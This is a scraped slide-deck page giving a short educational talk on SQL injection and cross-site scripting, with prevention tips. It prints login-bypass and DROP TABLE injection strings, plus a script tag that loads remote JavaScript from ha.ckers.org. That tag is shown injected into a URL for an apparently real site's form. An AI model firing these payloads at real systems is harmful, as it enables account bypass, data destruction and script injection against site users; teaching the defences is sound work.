Web security 2010

67 %
33 %
Information about Web security 2010

Published on February 16, 2014

Author: alokbabu1

Source: slideshare.net


One of my short presentation on web security. (Demo)
- Sql injection
- Cross site scripting.

Software Security

What is software Security? • Application security encompasses measures taken throughout the application's life-cycle to prevent exceptions in the security policy of an application or the underlying system (vulnerabilities) through flaws in the design, development, deployment, upgrade, or maintenance of the application, .

Why Software security is important?  Leakage of Sensitive data.  Crash of entire application or database.   Fixing issues after the attack will be more expensive and time consuming. Quality of the product.

Common vulnerabilities in web application  SQL Injection  Cross-Site Scripting(XSS)  Buffer overflows  HTTP response splitting

2010 statistics of web Vulnerability

What is SQL injection?  SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

How it works?


Login using SQL injection  "SELECT * FROM users WHERE name = ' " + userName + " ' AND password = ' “+Password+“ ';"

 a' or 't'='t  1' or 1=1

 SELECT * FROM users WHERE name = ' ' AND password = ' ' ;     SELECT * FROM users WHERE name = 'admin' AND password = 'pass123' ; SELECT * FROM users WHERE name = ' a' OR 't'='t ' AND password = ' a' OR 't'='t '; SELECT * FROM users WHERE name = ' a' OR 't'='t ' AND password = ' a' OR 't'='t '; DROP TABLE users; - -';


XSS( Cross-Site Scripting)

Cross-site Scripting  Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users.

How it works Script Injection     Same as before, but instead of placing code in URL, script code is saved on the application website and stored in database using their own non-validated forms When that data is retrieved from database and users load that webpage the code executes and attack occurs User would never know the code was executed without viewing the source of each webpage, since the link looks valid The application website owner is potentially liable since the attack code is stored on their site

 <SCRIPT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

http://www.easydoc.com.au/test/personalprofile.action ?address1= &suburb= &state= &zipcode=1 &homePhone= &mobilenumber= &reminderOption=0 &title=Dr &firstname=<SCRIPT SRC="http://ha.ckers.org/xss.js"></SCRIPT> &lastname=Doctor &photoupload= &smsOption=0 &type=GP &reqNo=82

Preventing SQL injection and XSS  SCRUB Error handling Error messages divulge information that can be used by hacker  VALIDATE all user entered parameters  CHECK data types and lengths  DISALLOW unwanted data (e.g. HTML tags, JavaScript)  ESCAPE questionable characters (ticks, --,semi-colon, brackets, etc.)

Thank You

Add a comment


Smith | 21/01/15
Smith | 21/01/15

Related presentations

Related pages

Kaspersky Internet Security | Kaspersky Lab

Kaspersky Internet Security 2017 Premium-Schutz für PC, Mac und Android
Read more

Web Security: Are You Part Of The Problem? – Smashing Magazine

Website security is an interesting topic and should be high on the radar of anyone who has a Web presence under their control. Ineffective Web security ...
Read more

Security | Microsoft

Enterprise security from Microsoft helps you protect and defend against cybersecurity threats in your apps, devices, and data.
Read more

W2SP 2010: Web 2.0 Security & Privacy 2010

W2SP 2010: Web 2.0 Security and Privacy 2010 Thursday, May 20 The Claremont Resort, Oakland, California The goal of this one day workshop is to bring ...
Read more

Web Security | Intel Security

Web security solutions from Intel Security stop incoming web threats, prevent the exploit of browser vulnerabilities, and monitor and control web use.
Read more

Symantec - Global Leader In Next-Generation Cyber Security

Symantec provides security products and solutions to protect small, medium, and enterprise businesses from advanced threats, malware, and other cyber attacks.
Read more

security essen | Die Weltleitmesse für Sicherheit und ...

Die Security Essen feiert ihr 40-jähriges Jubiläum und präsentiert sich erneut als impulsgebende Weltleitmesse. Globale Herausforderungen und aktuelle ...
Read more

Norton Antivirus und Internet Security Software | Norton.de

Im Test: Norton Security-App für Android aus dem GooglePlay Store ... Norton Safe Web; Norton Computer Tune Up; Norton Safe Search; Support; Norton-Support;
Read more

Kaspersky Antivirus Protection & Internet Security ...

Kaspersky Lab is committed to working with premier software and hardware vendors to provide the best security solutions possible. Learn more about them here.
Read more

Norton™ Internet Security – Virenschutz | Norton.de

Norton™ Internet Security bietet umfassenden Virenschutz und ultra-schnelles Anti-Spyware. Offizielle deutsche Norton Website besuchen!
Read more